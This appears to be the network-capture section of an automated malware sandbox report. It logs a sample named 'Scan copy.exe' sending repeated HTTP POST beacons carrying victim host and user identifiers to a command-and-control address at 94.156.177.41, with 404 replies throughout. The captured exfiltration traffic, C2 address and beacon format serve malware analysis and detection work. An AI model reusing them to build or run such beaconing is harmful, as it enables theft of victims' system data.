Nov 28, 2024 09:14:42.534472942 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:43.957528114 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:43 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
16	192.168.2.7	49775	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:44.225384951 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:44.345690966 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:45.763281107 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:45 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
17	192.168.2.7	49779	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:46.037662029 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:46.159487009 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:47.671871901 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:47 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
18	192.168.2.7	49785	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:47.943588972 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:48.063766003 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:49.534215927 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:49 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
19	192.168.2.7	49791	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:49.802853107 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:49.922880888 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:51.346460104 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:51 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
20	192.168.2.7	49795	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:51.616909981 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:51.737035990 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:53.209688902 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:52 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49799	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:53.571193933 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:53.691338062 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:55.171257973 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:54 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49804	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:55.442383051 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:55.562437057 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:57.021995068 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:56 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
23	192.168.2.7	49808	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:57.294624090 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:57.414725065 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:14:58.885855913 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:14:58 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.7	49814	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:14:59.152620077 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:14:59.272741079 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:00.692267895 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:00 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.7	49820	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:00.971061945 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:01.091238976 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:02.364192009 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:02 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.7	49823	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:02.630995989 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:02.750976086 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:04.221290112 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:03 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.7	49829	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:04.490891933 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:04.611133099 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:06.031249046 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:05 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.7	49833	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:06.305591106 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:06.425626993 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:07.898154020 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:07 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.7	49839	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:08.162962914 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:08.283034086 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:09.702014923 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:09 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.7	49844	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:09.972512007 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:10.092586994 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:11.605264902 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:11 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.7	49849	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:11.866663933 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:11.986717939 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:13.478025913 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:13 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.7	49854	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:13.749624014 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:13.869863987 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:15.453273058 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:15 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.7	49859	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:15.723330975 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:15.847454071 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:17.303266048 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:17 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.7	49864	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:17.651669025 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:17.771783113 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:19.281728029 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:19 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
35	192.168.2.7	49869	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:19.551938057 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:19.671910048 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
Nov 28, 2024 09:15:21.096005917 CET	193	IN	HTTP/1.1 404 Not Found Server: nginx/1.26.1 Date: Thu, 28 Nov 2024 08:15:20 GMT Content-Type: text/html; charset=utf-8 Connection: close X-Powered-By: PHP/5.4.16 Data Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
36	192.168.2.7	49874	94.156.177.41	80	7380	C:\Users\user\Desktop\Scan copy.exe

Timestamp	Bytes transferred	Direction	Data
Nov 28, 2024 09:15:21.370218039 CET	245	OUT	POST /simple/five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: 94.156.177.41 Accept: / Content-Type: application/octet-stream Content-Encoding: binary Content-Key: A6A8C306 Content-Length: 165 Connection: close
Nov 28, 2024 09:15:21.490326881 CET	165	OUT	Data Raw: 12 00 28 00 00 00 07 00 00 00 63 6b 61 76 2e 72 75 01 00 12 00 00 00 66 00 72 00 6f 00 6e 00 74 00 64 00 65 00 73 00 6b 00 01 00 0c 00 00 00 38 00 34 00 31 00 36 00 37 00 35 00 01 00 18 00 00 00 46 00 52 00 4f 00 4e 00 54 00 44 00 45 00 53 00 4b Data Ascii: (ckav.rufrontdesk841675FRONTDESK-PC0FDD42EE188E931437F4FBE2C
